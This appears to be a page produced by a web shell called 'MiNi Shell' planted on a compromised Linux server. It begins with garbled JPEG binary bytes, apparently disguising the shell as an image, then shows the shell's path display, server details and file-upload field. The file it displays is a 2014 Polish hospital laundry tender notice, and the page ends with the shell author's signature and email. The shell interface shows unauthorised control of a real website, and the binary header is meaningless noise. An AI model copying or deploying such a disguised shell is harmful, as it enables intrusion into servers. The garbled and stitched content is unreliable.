JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140328/105544-N-2014.html

<p class="kh_header"><b>Ostrzeszów: Świadczenie usług pralniczych  dla Zespołu Zakładów Opieki Zdrowotnej
w Ostrzeszowie w okresie 24 miesięcy-nr sprawy ZZOZ/ZP-2 /2014.</b><br>
<b>Numer ogłoszenia: 105544 - 2014; data zamieszczenia: 28.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Zakładów Opieki Zdrowotnej w Ostrzeszowie , Aleja Wolności 4, 63-500 Ostrzeszów, woj. wielkopolskie, tel. 062 5032231, faks 062 5032280.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital.ostrzeszow.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pralniczych  dla Zespołu Zakładów Opieki Zdrowotnej
w Ostrzeszowie w okresie 24 miesięcy-nr sprawy ZZOZ/ZP-2 /2014..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług pralniczych pościeli szpitalnej, odzieży ochronnej robaczej będącej własnością Zamawiającego.
Przedmiot zamówienia obejmuje: 
1.	pranie wodne bielizny szpitalnej (w tym dezynfekcję, suszenie, prasowanie, maglowanie, krochmalenie, sterylizację wybranych asortymentów), fasonowaniem i sortowaniem,
2.	płukanie przy użyciu środków antystatycznych ( w przypadku kocy, pidżam, podomek, ręczników)
3.	naprawę bielizny, w tym także wymiana uszkodzonych guzików, nap i zamków błyskawicznych,
4.	czyszczenie chemiczne oraz dezynfekcje materacy i poduszek, kocy
5.	bieżąca naprawę bielizny pościelowej oraz odzieży ochronnej ( tj. szycie, cerowanie, doszywanie guzików i troczków, zeszywanie rozdarć),
6.	wyselekcjonowanie bielizny i odzieży uszkodzonej wyniku prania lub zużycia,
7.	odbiór  brudnej bielizny pościelowej oraz odzieży ochronnej  wraz z  załadunkiem,  transport oraz przywóz i rozładunek czystej bielizny pościelowej oraz odzieży ochronnej,
8.	trwałe znakowaniu przy użyciu akcesoriów nie poddających się spieraniu nowej bielizny szpitalnej, 
9.	uzupełnieniem bielizny szpitalnej w dwóch transzach tj. pierwsze uzupełnienie bielizny szpitalnej
(tj. ? wskazanego poniżej asortymentu) nastąpi w czasie do 2 miesięcy od momentu podpisania Umowy, kolejne w  kolejnym roku trwania Umowy.
W postępowaniu mogą wziąć udział Pralnie spełniające aktualnie obowiązujące normy i przepisy sanitarno - epidemiologiczne , w szczególności Ustawy z dnia 5 grudnia 2008 r. o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi ( Dz.U. Nr 234 , poz.1570 oraz z 2009 r. Nr 76 , poz. 641 )ze zm. Szczegółowy opis zakresu świadczenia usług pralniczych dla ZZOZ w  Ostrzeszowie  zawiera  Załącznik nr 4 do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza w okresie 24 miesięcy  udzielenie zamówień uzupełniających, stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień,  zgodnie z przedmiotem zamówienia - ze względu na wyjątkowa sytuację niewynikającą z przyczyn leżących po stronie zamawiającego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Opinia właściwego państwowego inspektora sanitarnego potwierdzającą, że pralnia spełnia wymogi sanitarno-higieniczne i techniczne ( bariera higieniczna ),  do wykonywania usług w zakresie prania wodnego i chemicznego bielizny dla jednostek służby zdrowia  lecznictwa otwartego i zamkniętego, lub minimum jednego protokołu kontroli Inspektora Sanitarnego z okresu ostatnich 12 miesięcy nie stwierdzającego nieprawidłowości odnośnie ww. wymagań.

Ocena spełniania warunków udziału w postępowaniu będzie dokonywana na podstawie oświadczeń i dokumentów złożonych w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wydruku raportu z systemu dozującego środki piorące z jednego dnia produkcji z uwzględnieniem dnia, godziny procesu oraz numerem programu - dokument z ostatniego miesiąca przed składaniem ofert. 
Ocena spełniania warunków udziału w postępowaniu będzie dokonywana na podstawie oświadczeń i dokumentów złożonych w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Wykaz środków transportu- przeznaczonych do realizacji zamówienia wraz z opinią właściwego Inspektora Sanitarnego potwierdzającą, że pojazdy przystosowane są do przewozu bielizny szpitalnej, z jednoczesnym podaniem numerów rejestracyjnych pojazdów, ich ładownością.
- Wykaz sprzętu pralniczego i innych urządzeń niezbędnych do wykonania zamówienia, jakimi dysponuje wykonawca, z podaniem: nazw, roku produkcji i wydajności, oraz raportów serwisowych potwierdzających nadzór nad stosowaną przez Wykonawcę technologią prania, podpisane przez technologa, producenta środków piorących lub autoryzowanego przedstawiciela Producenta tych środków z ostatnich 3 miesięcy.

-  Wykaz środków piorących i dezynfekujących, jakich wykonawca zamierza używać do wykonywania zamówienia, oświadczenie o posiadaniu dokumentów dopuszczających do obrotu na terenie RP używanych środków piorąco-dezynfekujących i biobójczych, zgodnie z obowiązującymi przepisami ( świadectwa rejestracji, atesty, opinie PZH, pozwolenia Ministra Zdrowia na wprowadzenie do obrotu produktu biobójczego, oraz pozytywną opinię Instytutu Matki i Dziecka lub Centrum Zdrowia Dziecka dla środków do prania bielizny noworodkowej, niemowlęcej i dziecięcej),

-Potwierdzenie producenta środków piorących, że pralnia wykonawcy jest pod jego nadzorem co do prawidłowego przebiegu procesu prania i dezynfekcji oraz jakości prania bielizny. W przypadku, kiedy środki piorące pochodzą od zagranicznego producenta, to Wykonawca składa oświadczenie, że środki piorące pochodzą od zagranicznego producenta( nazwa). Wymagane specyfikacją dokumenty wystawia polski przedstawiciel zagranicznego producenta.

-  Atest PZH na worki foliowe, jakich Wykonawca zamierza używać do wykonania przedmiotu zamówienia, stwierdzający możliwość stosowania worków foliowych do transportu bielizny szpitalnej.

Wszystkie dokumenty muszą być wydane dla pralni zgłoszonej do wykonania usługi 

Ocena spełniania warunków udziału w postępowaniu będzie dokonywana na podstawie oświadczeń i dokumentów złożonych w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykaz osób ( tylko odpowiedzialnych za wykonanie zamówienia) i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, a także zakres wykonywanych przez nich czynności wraz ze sposobem kontaktowania się z nimi.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Suma gwarancyjna 300 tys. zł na jedno i wszystkie zdarzenia  w okresie trwania ubezpieczenia.

Ocena spełniania warunków udziału w postępowaniu będzie dokonywana na podstawie oświadczeń i dokumentów złożonych w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- Oświadczenie,  Załącznik nr 3.
 
- Opinia właściwego państwowego inspektora sanitarnego potwierdzającą, że pralnia spełnia wymogi sanitarno-higieniczne i techniczne ( bariera higieniczna ),  do wykonywania usług w zakresie prania wodnego i chemicznego bielizny dla jednostek służby zdrowia  lecznictwa otwartego i zamkniętego, lub minimum jednego protokołu kontroli Inspektora Sanitarnego z okresu ostatnich 12 miesięcy nie stwierdzającego nieprawidłowości odnośnie ww. wymagań.
- Opinię właściwego państwowego inspektora sanitarnego potwierdzającą, że pralnia spełnia wymogi sanitarno-higieniczne i techniczne ( bariera higieniczna ),  do wykonywania usług w zakresie prania wodnego i chemicznego bielizny dla jednostek służby zdrowia  lecznictwa otwartego i zamkniętego, lub minimum jednego protokołu kontroli Inspektora Sanitarnego z okresu ostatnich 12  miesięcy nie stwierdzającego nieprawidłowości odnośnie ww. wymagań.
-  Wykaz środków transportu- przeznaczonych do realizacji zamówienia wraz z opinią właściwego Inspektora Sanitarnego potwierdzającą, że pojazdy przystosowane są do przewozu bielizny szpitalnej, z jednoczesnym podaniem numerów rejestracyjnych pojazdów, ich ładownością.

- Wykaz osób ( tylko odpowiedzialnych za wykonanie zamówienia) i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, a także zakres wykonywanych przez nich czynności wraz ze sposobem kontaktowania się z nimi. 

- Wykaz sprzętu pralniczego i innych urządzeń niezbędnych do wykonania zamówienia, jakimi dysponuje wykonawca, z podaniem: nazw, roku produkcji i wydajności, oraz raportów serwisowych potwierdzających nadzór nad stosowaną przez Wykonawcę technologią prania , podpisane przez technologa , producenta środków piorących lub autoryzowanego przedstawiciela Producenta tych środków z ostatnich 3 miesięcy.

-  Wykaz środków piorących i dezynfekujących, jakich wykonawca zamierza używać do wykonywania zamówienia, oświadczenie o posiadaniu dokumentów dopuszczających do obrotu na terenie RP używanych środków piorąco-dezynfekujących i biobójczych, zgodnie z obowiązującymi przepisami ( świadectwa rejestracji, atesty, opinie PZH, pozwolenia Ministra Zdrowia na wprowadzenie do obrotu produktu biobójczego, oraz pozytywną opinię Instytutu Matki i Dziecka lub Centrum Zdrowia Dziecka dla środków do prania bielizny noworodkowej, niemowlęcej i dziecięcej),


- Potwierdzenie producenta środków piorących, że pralnia wykonawcy jest pod jego nadzorem co do prawidłowego przebiegu procesu prania i dezynfekcji oraz jakości prania bielizny. W przypadku, kiedy środki piorące pochodzą od zagranicznego producenta, to  Wykonawca składa oświadczenie, że środki piorące pochodzą od zagranicznego producenta    ( nazwa). Wymagane specyfikacją dokumenty wystawia polski przedstawiciel zagranicznego producenta.

- Wydruku raportu z systemu dozującego środki piorące z jednego dnia produkcji z uwzględnieniem dnia, godziny procesu oraz numerem programu - dokument z ostatniego miesiąca przed składaniem ofert. 

-  Atest PZH na worki foliowe, jakich Wykonawca zamierza używać do wykonania przedmiotu zamówienia , stwierdzający możliwość stosowania worków foliowych do transportu bielizny szpitalnej.

- Dokument potwierdzający zapewnienie ciągłości wykonywania usług pralniczych                            w przypadku awarii w zakładzie pralniczym wykonawcy, 

-  Pełnomocnictwa  do reprezentowania Wykonawców.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- załączenia wypełnionego i podpisanego  Formularza oferty - Załącznik nr 1 do SIWZ
- parafowania przez wykonawcę Projektu umowy - Załącznik nr 2  do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo do przedłużenia okresu obowiązywania umowy do czasu wykorzystania wartości umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.szpital.ostrzeszow.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZESPÓŁ ZAKŁADÓW OPIEKI ZDROWOTNEJ 
ul. Aleja Wolności 4
63-500 Ostrzeszów
tel. (62) 50-32  236, fax (62) 50-32  280 
e-mail: przetargi@szpital.ostrzeszow.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2014 godzina 11:30, miejsce: ZESPÓŁ ZAKŁADÓW OPIEKI ZDROWOTNEJ 
ul. Aleja Wolności 4,63-500 Ostrzeszów, budynek administracji, sekretariat, pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com